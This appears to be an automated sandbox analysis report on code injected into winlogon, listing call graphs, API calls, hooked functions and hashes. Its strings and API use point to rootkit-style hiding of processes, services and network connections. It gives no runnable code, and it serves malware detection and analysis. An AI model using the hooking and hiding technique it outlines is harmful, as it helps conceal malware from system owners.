2d0165ed558 8696 2d0165ed568 8695->8696 8697 2d0165ed3d0 __free_lconv_mon 11 API calls 8696->8697 8698 2d0165ed573 __vcrt_uninitialize_ptd 8696->8698 8697->8698 8849 2d0165eb7d4 8856 2d0165eb707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8849->8856 8850 2d0165eb7fb 8851 2d0165e9a64 _CreateFrameInfo 9 API calls 8850->8851 8852 2d0165eb800 8851->8852 8853 2d0165e9a64 _CreateFrameInfo 9 API calls 8852->8853 8854 2d0165eb80b __FrameHandler3::GetHandlerSearchState 8852->8854 8853->8854 8855 2d0165ea114 9 API calls Is_bad_exception_allowed 8855->8856 8856->8850 8856->8854 8856->8855 8857 2d0165ea13c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8856->8857 8857->8856 8313 2d0165f18d3 8314 2d0165f18e0 8313->8314 8315 2d0165f18f5 8314->8315 8316 2d0165f190e 8314->8316 8317 2d0165edadc __free_lconv_mon 11 API calls 8315->8317 8320 2d0165ee5e4 23 API calls 8316->8320 8321 2d0165f1905 8316->8321 8318 2d0165f18fa 8317->8318 8319 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 8318->8319 8319->8321 8320->8321 8322 2d0165e60d3 8323 2d0165e60e0 8322->8323 8324 2d0165e60ec GetThreadContext 8323->8324 8332 2d0165e624a 8323->8332 8325 2d0165e6112 8324->8325 8324->8332 8330 2d0165e6139 8325->8330 8325->8332 8326 2d0165e632e 8328 2d0165e634e 8326->8328 8333 2d0165e4810 VirtualFree 8326->8333 8327 2d0165e6271 VirtualProtect FlushInstructionCache 8327->8332 8329 2d0165e5220 3 API calls 8328->8329 8337 2d0165e6353 8329->8337 8331 2d0165e61bd 8330->8331 8334 2d0165e6196 SetThreadContext 8330->8334 8332->8326 8332->8327 8333->8328 8334->8331 8335 2d0165e63a7 8338 2d0165e7d70 _log10_special 8 API calls 8335->8338 8336 2d0165e6367 ResumeThread 8336->8337 8337->8335 8337->8336 8339 2d0165e63ef 8338->8339 8340 2d0165f1ed0 8341 2d0165ef0c0 69 API calls 8340->8341 8342 2d0165f1ed9 8341->8342 8343 2d0165e7f0c 8350 2d0165e968c 8343->8350 8347 2d0165e7f19 8351 2d0165e9a80 _CreateFrameInfo 9 API calls 8350->8351 8352 2d0165e7f15 8351->8352 8352->8347 8353 2d0165eca6c 8352->8353 8354 2d0165ed3d0 __free_lconv_mon 11 API calls 8353->8354 8355 2d0165e7f22 8354->8355 8355->8347 8356 2d0165e96a0 8355->8356 8359 2d0165e9a1c 8356->8359 8358 2d0165e96a9 8358->8347 8360 2d0165e9a2d 8359->8360 8361 2d0165e9a42 __std_exception_destroy 8359->8361 8362 2d0165ea3d4 _CreateFrameInfo 6 API calls 8360->8362 8361->8358 8363 2d0165e9a32 8362->8363 8365 2d0165ea41c 8363->8365 8366 2d0165ea1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 8365->8366 8367 2d0165ea44a 8366->8367 8368 2d0165ea45c TlsSetValue 8367->8368 8369 2d0165ea454 8367->8369 8368->8369 8369->8361 8858 2d0165f5208 8861 2d0165eb630 8858->8861 8862 2d0165eb64f 8861->8862 8864 2d0165eb6a0 8861->8864 8863 2d0165e9a64 _CreateFrameInfo 9 API calls 8862->8863 8862->8864 8863->8864 8699 2d0165e8386 8702 2d0165e9818 8699->8702 8701 2d0165e83b1 8703 2d0165e9839 8702->8703 8704 2d0165e986e __std_exception_destroy 8702->8704 8703->8704 8705 2d0165ecb18 __std_exception_copy 49 API calls 8703->8705 8704->8701 8705->8704 8865 2d0165e2604 8867 2d0165e2683 _invalid_parameter_noinfo 8865->8867 8866 2d0165e2872 8867->8866 8868 2d0165e26e5 GetFileType 8867->8868 8869 2d0165e2709 8868->8869 8870 2d0165e26f3 StrCpyW 8868->8870 8881 2d0165e19d8 GetFinalPathNameByHandleW 8869->8881 8871 2d0165e2718 8870->8871 8875 2d0165e2722 8871->8875 8879 2d0165e27c7 8871->8879 8873 2d0165e3c74 StrCmpNIW 8873->8875 8874 2d0165e3c74 StrCmpNIW 8874->8879 8875->8866 8875->8873 8886 2d0165e330c StrCmpIW 8875->8886 8890 2d0165e1cd8 8875->8890 8878 2d0165e330c 4 API calls 8878->8879 8879->8866 8879->8874 8879->8878 8880 2d0165e1cd8 2 API calls 8879->8880 8880->8879 8882 2d0165e1a02 StrCmpNIW 8881->8882 8883 2d0165e1a41 8881->8883 8882->8883 8884 2d0165e1a1c lstrlenW 8882->8884 8883->8871 8884->8883 8885 2d0165e1a2e StrCpyW 8884->8885 8885->8883 8887 2d0165e333e StrCpyW StrCatW 8886->8887 8888 2d0165e3355 PathCombineW 8886->8888 8889 2d0165e335e 8887->8889 8888->8889 8889->8875 8891 2d0165e1cef 8890->8891 8892 2d0165e1cf8 8890->8892 8893 2d0165e152c 2 API calls 8891->8893 8892->8875 8893->8892 8706 2d0165ecd84 8707 2d0165ecd8c 8706->8707 8709 2d0165ecdbd 8707->8709 8710 2d0165ecdb9 8707->8710 8712 2d0165efa3c 8707->8712 8717 2d0165ecde8 8709->8717 8713 2d0165ef7c4 5 API calls 8712->8713 8714 2d0165efa72 8713->8714 8715 2d0165efa77 8714->8715 8716 2d0165efa91 InitializeCriticalSectionAndSpinCount 8714->8716 8715->8707 8716->8715 8718 2d0165ece13 8717->8718 8719 2d0165ece17 8718->8719 8720 2d0165ecdf6 DeleteCriticalSection 8718->8720 8719->8710 8720->8718 9371 2d0165ef484 GetCommandLineA GetCommandLineW 9372 2d0165f5081 __scrt_dllmain_exception_filter 9373 2d0165efe80 9384 2d0165ecdcc EnterCriticalSection 9373->9384 7540 2d0165e597d 7542 2d0165e5984 7540->7542 7541 2d0165e59eb 7542->7541 7543 2d0165e5a67 VirtualProtect 7542->7543 7544 2d0165e5a93 GetLastError 7543->7544 7545 2d0165e5aa1 7543->7545 7544->7545 8894 2d0165ec9fc 8895 2d0165edb74 __free_lconv_mon 11 API calls 8894->8895 8896 2d0165eca0c 8895->8896 8897 2d0165edb74 __free_lconv_mon 11 API calls 8896->8897 8898 2d0165eca20 8897->8898 8899 2d0165edb74 __free_lconv_mon 11 API calls 8898->8899 8900 2d0165eca34 8899->8900 8901 2d0165edb74 __free_lconv_mon 11 API calls 8900->8901 8902 2d0165eca48 8901->8902 8903 2d0165e23f8 8904 2d0165e2476 _invalid_parameter_noinfo 8903->8904 8905 2d0165e24db GetFileType 8904->8905 8911 2d0165e25b2 8904->8911 8906 2d0165e24fd 8905->8906 8907 2d0165e24e9 StrCpyW 8905->8907 8908 2d0165e19d8 4 API calls 8906->8908 8912 2d0165e250a 8907->8912 8908->8912 8909 2d0165e3c74 StrCmpNIW 8909->8912 8910 2d0165e330c 4 API calls 8910->8912 8912->8909 8912->8910 8912->8911 8913 2d0165e1cd8 2 API calls 8912->8913 8913->8912 8914 2d0165e2bf4 8915 2d0165e2c65 8914->8915 8916 2d0165e2f88 8915->8916 8917 2d0165e2c91 GetModuleHandleA 8915->8917 8918 2d0165e2cb5 8917->8918 8919 2d0165e2ca3 GetProcAddress 8917->8919 8918->8916 8920 2d0165e2cdc StrCmpNIW 8918->8920 8919->8918 8920->8916 8926 2d0165e2d01 8920->8926 8921 2d0165e1934 6 API calls 8921->8926 8922 2d0165e2ebd lstrlenW 8922->8926 8923 2d0165e2e13 lstrlenW 8923->8926 8924 2d0165e1c00 StrCmpIW StrCmpW 8924->8926 8925 2d0165e3c74 StrCmpNIW 8925->8926 8926->8916 8926->8921 8926->8922 8926->8923 8926->8924 8926->8925 8721 2d0165f0f70 8722 2d0165f0f9d 8721->8722 8723 2d0165edadc __free_lconv_mon 11 API calls 8722->8723 8725 2d0165f0fb2 8722->8725 8724 2d0165f0fa7 8723->8724 8726 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 8724->8726 8727 2d0165e7d70 _log10_special 8 API calls 8725->8727 8726->8725 8728 2d0165f1370 8727->8728 9385 2d0165f0070 9386 2d0165f00c7 9385->9386 9387 2d0165f00a0 9385->9387 9389 2d0165f019c 9386->9389 9408 2d0165ecdcc EnterCriticalSection 9386->9408 9387->9386 9388 2d0165ed3d0 __free_lconv_mon 11 API calls 9387->9388 9392 2d0165f00b4 9387->9392 9388->9392 9391 2d0165f0203 9389->9391 9394 2d0165f02d0 9389->9394 9397 2d0165f01ca 9389->9397 9407 2d0165f0261 9391->9407 9409 2d0165ece20 LeaveCriticalSection 9391->9409 9392->9386 9393 2d0165f0149 9392->9393 9404 2d0165f0104 9392->9404 9395 2d0165edadc __free_lconv_mon 11 API calls 9393->9395 9399 2d0165f02dd 9394->9399 9410 2d0165ece20 LeaveCriticalSection 9394->9410 9400 2d0165f014e 9395->9400 9397->9391 9402 2d0165ed258 _invalid_parameter_noinfo 23 API calls 9397->9402 9401 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 9400->9401 9401->9404 9405 2d0165f01f3 9402->9405 9403 2d0165ed258 23 API calls _invalid_parameter_noinfo 9403->9407 9406 2d0165ed258 _invalid_parameter_noinfo 23 API calls 9405->9406 9406->9391 9407->9403 9411 2d0165f1470 9412 2d0165f148f 9411->9412 9413 2d0165f1508 9412->9413 9415 2d0165f149f 9412->9415 9419 2d0165e8630 9413->9419 9417 2d0165e7d70 _log10_special 8 API calls 9415->9417 9418 2d0165f14fe 9417->9418 9422 2d0165e8644 IsProcessorFeaturePresent 9419->9422 9423 2d0165e865b 9422->9423 9428 2d0165e86e0 RtlCaptureContext RtlLookupFunctionEntry 9423->9428 9429 2d0165e866f 9428->9429 9430 2d0165e8710 RtlVirtualUnwind 9428->9430 9431 2d0165e8528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9429->9431 9430->9429

                                                          Executed Functions

                                                          Function 000002D0165E2990 Relevance: 3.1, APIs: 2, Instructions: 64nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 263 2d0165e2990-2d0165e29da NtEnumerateValueKey 264 2d0165e29dc-2d0165e29df 263->264 265 2d0165e2a38-2d0165e2a56 263->265 264->265 266 2d0165e29e1-2d0165e29e3 264->266 267 2d0165e29e6-2d0165e29e8 266->267 267->265 268 2d0165e29ea-2d0165e2a09 NtEnumerateValueKey 267->268 269 2d0165e2a1a 268->269 270 2d0165e2a0b-2d0165e2a0e 268->270 273 2d0165e2a1e-2d0165e2a36 call 2d0165e3c74 269->273 271 2d0165e2a14-2d0165e2a18 270->271 272 2d0165e2a10-2d0165e2a12 270->272 271->273 272->273 273->265 273->267
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: EnumerateValue
                                                          • String ID:
                                                          • API String ID: 1749906896-0
                                                          • Opcode ID: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                          • Instruction ID: 606513798a674d745bee18d13d3790bac6d00b0e698f942fa88182f8053d0d90
                                                          • Opcode Fuzzy Hash: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                          • Instruction Fuzzy Hash: 3F219D323147918AE7748F56AC8462EF7A4F784BD0FD1812ADE9953B68DF75C941C700
                                                          Function 000002D0165E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: d3924993ba69a97cbb640120d18c926c77fb927efbb2cd3c3158469372b4aaa9
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 84711836210A9086EB209FB2ECD8B9973A5F784B89F801112DE4E47B78EF39C954C744
                                                          Function 000002D0165E3BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: 3b414060dabd0ec2e9254b323d1504b4e4152d4d307d5e49c66db89ab63d7900
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: 2C118E36700B9082EF549B65E888769B365FB48B94F94042ADE8D03765EF3ECA448714
                                                          Function 000002D0165E5F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 57 2d0165e5f60-2d0165e5f87 58 2d0165e5f9b-2d0165e5fa6 GetCurrentThreadId 57->58 59 2d0165e5f89-2d0165e5f98 57->59 60 2d0165e5fa8-2d0165e5fad 58->60 61 2d0165e5fb2-2d0165e5fb9 58->61 59->58 62 2d0165e63df-2d0165e63f6 call 2d0165e7d70 60->62 63 2d0165e5fcb-2d0165e5fdf 61->63 64 2d0165e5fbb-2d0165e5fc6 call 2d0165e5d90 61->64 67 2d0165e5fee-2d0165e5ff4 63->67 64->62 70 2d0165e5ffa-2d0165e6003 67->70 71 2d0165e60c5-2d0165e60e6 67->71 73 2d0165e604a-2d0165e60bd call 2d0165e4940 call 2d0165e48e0 call 2d0165e48a0 70->73 74 2d0165e6005-2d0165e6048 call 2d0165e89f0 70->74 77 2d0165e624f-2d0165e6260 call 2d0165e78ef 71->77 78 2d0165e60ec-2d0165e610c GetThreadContext 71->78 85 2d0165e60c0 73->85 74->85 88 2d0165e6265-2d0165e626b 77->88 82 2d0165e624a 78->82 83 2d0165e6112-2d0165e6133 78->83 82->77 83->82 91 2d0165e6139-2d0165e6142 83->91 85->67 94 2d0165e632e-2d0165e633e 88->94 95 2d0165e6271-2d0165e62c8 VirtualProtect FlushInstructionCache 88->95 92 2d0165e6144-2d0165e6155 91->92 93 2d0165e61c2-2d0165e61d3 91->93 97 2d0165e61bd 92->97 98 2d0165e6157-2d0165e616c 92->98 101 2d0165e6245 93->101 102 2d0165e61d5-2d0165e61f3 93->102 104 2d0165e634e-2d0165e635a call 2d0165e5220 94->104 105 2d0165e6340-2d0165e6347 94->105 99 2d0165e62ca-2d0165e62d4 95->99 100 2d0165e62f9-2d0165e6329 call 2d0165e7cdc 95->100 97->101 98->97 107 2d0165e616e-2d0165e61b8 call 2d0165e3da0 SetThreadContext 98->107 99->100 108 2d0165e62d6-2d0165e62f1 call 2d0165e47c0 99->108 100->88 102->101 109 2d0165e61f5-2d0165e6240 call 2d0165e3d30 call 2d0165e790d 102->109 118 2d0165e635f-2d0165e6365 104->118 105->104 111 2d0165e6349 call 2d0165e4810 105->111 107->97 108->100 109->101 111->104 122 2d0165e63a7-2d0165e63c5 118->122 123 2d0165e6367-2d0165e63a5 ResumeThread call 2d0165e7cdc 118->123 126 2d0165e63d9 122->126 127 2d0165e63c7-2d0165e63d6 122->127 123->118 126->62 127->126
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 29e89488c60d02e571c563a50b12f5ffc17bf35334ed45369d38bbcd13da9428
                                                          • Instruction ID: 9662dead72aeb1811aaee060e3677146b33180affbabf47c8df6dc80c19f8b34
                                                          • Opcode Fuzzy Hash: 29e89488c60d02e571c563a50b12f5ffc17bf35334ed45369d38bbcd13da9428
                                                          • Instruction Fuzzy Hash: 8AD19B76208B9886DB709B96E89435AB7A0F7C8B84F500117EACD47BB5DF3DCA41CB10
                                                          Function 000002D0165E5500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 2d0165e5500-2d0165e552c 130 2d0165e552e-2d0165e5536 129->130 131 2d0165e553d-2d0165e5546 129->131 130->131 132 2d0165e5548-2d0165e5550 131->132 133 2d0165e5557-2d0165e5560 131->133 132->133 134 2d0165e5562-2d0165e556a 133->134 135 2d0165e5571-2d0165e557a 133->135 134->135 136 2d0165e557c-2d0165e5581 135->136 137 2d0165e5586-2d0165e5591 GetCurrentThreadId 135->137 138 2d0165e5b03-2d0165e5b0a 136->138 139 2d0165e559d-2d0165e55a4 137->139 140 2d0165e5593-2d0165e5598 137->140 141 2d0165e55a6-2d0165e55ac 139->141 142 2d0165e55b1-2d0165e55ba 139->142 140->138 141->138 143 2d0165e55bc-2d0165e55c1 142->143 144 2d0165e55c6-2d0165e55d2 142->144 143->138 145 2d0165e55fe-2d0165e5655 call 2d0165e5b10 * 2 144->145 146 2d0165e55d4-2d0165e55f9 144->146 151 2d0165e566a-2d0165e5673 145->151 152 2d0165e5657-2d0165e565e 145->152 146->138 153 2d0165e5685-2d0165e568e 151->153 154 2d0165e5675-2d0165e5682 151->154 155 2d0165e5666 152->155 156 2d0165e5660 152->156 158 2d0165e56a3-2d0165e56c8 call 2d0165e7ca0 153->158 159 2d0165e5690-2d0165e56a0 153->159 154->153 157 2d0165e56d6-2d0165e56da 155->157 160 2d0165e56e0-2d0165e56e6 156->160 157->160 169 2d0165e56ce 158->169 170 2d0165e575d-2d0165e5772 call 2d0165e40f0 158->170 159->158 162 2d0165e56e8-2d0165e5704 call 2d0165e47c0 160->162 163 2d0165e5715-2d0165e571b 160->163 162->163 174 2d0165e5706-2d0165e570e 162->174 166 2d0165e571d-2d0165e573c call 2d0165e7cdc 163->166 167 2d0165e5745-2d0165e5758 163->167 166->167 167->138 169->157 176 2d0165e5774-2d0165e577c 170->176 177 2d0165e5781-2d0165e578a 170->177 174->163 176->157 178 2d0165e579c-2d0165e57ea call 2d0165e9090 177->178 179 2d0165e578c-2d0165e5799 177->179 182 2d0165e57f2-2d0165e57fa 178->182 179->178 183 2d0165e5907-2d0165e590f 182->183 184 2d0165e5800-2d0165e58eb call 2d0165e7870 182->184 185 2d0165e5953-2d0165e595b 183->185 186 2d0165e5911-2d0165e5924 call 2d0165e49c0 183->186 192 2d0165e58ef-2d0165e58fe call 2d0165e4490 184->192 193 2d0165e58ed 184->193 189 2d0165e595d-2d0165e5965 185->189 190 2d0165e5967-2d0165e5976 185->190 201 2d0165e5928-2d0165e5951 186->201 202 2d0165e5926 186->202 189->190 195 2d0165e5984-2d0165e5991 189->195 196 2d0165e597f 190->196 197 2d0165e5978 190->197 205 2d0165e5902 192->205 206 2d0165e5900 192->206 193->183 199 2d0165e5994-2d0165e59e9 call 2d0165e89f0 195->199 200 2d0165e5993 195->200 196->195 197->196 208 2d0165e59eb-2d0165e59f3 199->208 209 2d0165e59f8-2d0165e5a91 call 2d0165e4940 call 2d0165e48a0 VirtualProtect 199->209 200->199 201->183 202->185 205->182 206->183 214 2d0165e5a93-2d0165e5a98 GetLastError 209->214 215 2d0165e5aa1-2d0165e5b01 209->215 214->215 215->138
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 0f8d15ac30c01b929645c95d941df682bce9e25f3ebbd2babceaff1beb100a48
                                                          • Instruction ID: 91d6774ad46c386235acd3a2e63854d7d01febc248d6cb54e622c25492326936
                                                          • Opcode Fuzzy Hash: 0f8d15ac30c01b929645c95d941df682bce9e25f3ebbd2babceaff1beb100a48
                                                          • Instruction Fuzzy Hash: B302CB32619BC486EB60CB95F89435AF7A0F3C4794F504116EA8E87B68DF7EC954CB00
                                                          Function 000002D016582AC0 Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                          • String ID:
                                                          • API String ID: 3316853933-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: 6a883d376ffeba66a98c24e7e112f70bcf90b52d4dac6bcf29a405d078b72779
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 4591367270129187EB64CF66D88877D7B99FB54BD4F94C1269E0E0BB98DA38DC12C780
                                                          Function 000002D0165E3E10 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
                                                          • Instruction ID: 78a2d3ce8583cb03db523573b82d5d590513b3113fa3180013c3514e51ab8cc0
                                                          • Opcode Fuzzy Hash: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
                                                          • Instruction Fuzzy Hash: 7B31E322619AC5C1EF31DA95E89835AE6A4F384784F900526F5CD46BB9DF7ECB50CB00
                                                          Function 000002D0165E3620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002D0165E3639
                                                          • PathFindFileNameW.SHLWAPI ref: 000002D0165E3648
                                                            • Part of subcall function 000002D0165E3C74: StrCmpNIW.SHLWAPI(?,?,?,000002D0165E254B), ref: 000002D0165E3C8C
                                                            • Part of subcall function 000002D0165E3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3BCE
                                                            • Part of subcall function 000002D0165E3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3BFC
                                                            • Part of subcall function 000002D0165E3BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3C1E
                                                            • Part of subcall function 000002D0165E3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3C39
                                                            • Part of subcall function 000002D0165E3BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002D0165E365F), ref: 000002D0165E3C5A
                                                          • CreateThread.KERNELBASE ref: 000002D0165E368F
                                                            • Part of subcall function 000002D0165E1D40: GetCurrentThread.KERNEL32 ref: 000002D0165E1D4B
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: cb990258ece807ccee5563a4393ff2456787588b0a0e4b09880717b483ecbb5f
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: B9115230A106C181FF709BF0ACCD399A695BB64345FD04127D50E456F6DF7ACE488A00
